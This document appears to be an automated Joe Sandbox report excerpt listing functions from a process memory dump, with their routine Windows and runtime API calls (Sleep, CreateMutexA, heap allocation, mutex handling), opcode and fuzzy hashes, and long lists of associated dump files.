API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: db45a14af9187b58fa87ee08b8d237f6753c63d46b2b33a6d889b6daef2d8387
Instruction ID: 95cb7379bd2a0ced974b84ea764e00f22b4cd2e863d6fceee57004e65cd6bc84
Opcode Fuzzy Hash: db45a14af9187b58fa87ee08b8d237f6753c63d46b2b33a6d889b6daef2d8387
Instruction Fuzzy Hash: 922106317042009BFB18BB6CEC8977CB762EBC2310F24461EE484D76D1CB79A9808752

Function 0008A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c6b8ceefeac454f556024023fab932fc3cdfb9125362eb30840966ff97ae9402
Instruction ID: 2e7f3619ee6485af8c1fed47e1d6b472daacc039349691081924a0ce784c4a1b
Opcode Fuzzy Hash: c6b8ceefeac454f556024023fab932fc3cdfb9125362eb30840966ff97ae9402
Instruction Fuzzy Hash: 57210B31349200DAFB24776C989A77DB651BF83700F24491BE1C8D67D2DE6995819363

Function 0008A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 98c38dc8cbfa472503fcd6f9bb065ec3d95ca42bbe145bd17151016368da14cc
Instruction ID: 6616ba5a0e6e1b8dfcad5084f3b9b8fa71d63ff33f50ee8fe6ad27f649cceadf
Opcode Fuzzy Hash: 98c38dc8cbfa472503fcd6f9bb065ec3d95ca42bbe145bd17151016368da14cc
Instruction Fuzzy Hash: E321F8317442049BFB18AB6CDC8976CB762EBD7310F24461EE484DBBD5C775A6808752

Function 000BD82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000BA813,00000001,00000364,00000006,000000FF,?,000BEE3F,?,00000004,00000000,?,?), ref: 000BD871

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 31e632bbf26c8eaeaeb8b712e75ef7f68012319822c5b556fd6011b8047e453f
Instruction ID: c89f369574625aa83708a5a2cd6bce7e180366000dd79b57a48a508ec568e9f4
Opcode Fuzzy Hash: 31e632bbf26c8eaeaeb8b712e75ef7f68012319822c5b556fd6011b8047e453f
Instruction Fuzzy Hash: B9F02E3150152566EB713A729C01ADBF798DF85772F148023ED08AB181FF30DC0086E0

Non-executed Functions

Function 00082EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00082F5F
GetCurrentThreadId.KERNEL32 ref: 00082F7E
__Mtx_unlock.LIBCPMT ref: 00082FCC
__Cnd_broadcast.LIBCPMT ref: 00082FE3
__Mtx_unlock.LIBCPMT ref: 000830F5
GetCurrentThreadId.KERNEL32 ref: 00083132
__Mtx_unlock.LIBCPMT ref: 0008319B

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 6d61362ac3bdd30bc08093c5dbdb96f9307d92710649cc5a7894023d068b7171
Instruction ID: b74f7663b0441bd8ced70eba02f7ec8c2ee1a0ffc5ca9b6e70034bb135a09e0f
Opcode Fuzzy Hash: 6d61362ac3bdd30bc08093c5dbdb96f9307d92710649cc5a7894023d068b7171
Instruction Fuzzy Hash: 34A1B270A012159FEF60EF64C948B9AB7F8FF55B20F048529E855D7282EB35EA04CB91

Function 000BCBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000BCC66

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: cfb3b15a62d99b15b2120f1e1e2e570e0d05eadfd1a6de796b7619c1039f66ec
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: D1B10432A046869FEB25CF28C881FFEBFE5EF55340F14816AE855EB242D6349D41CB64

Function 0009BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0009BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0009BBE4
_xtime_get.LIBCPMT ref: 0009BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0009BC13

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
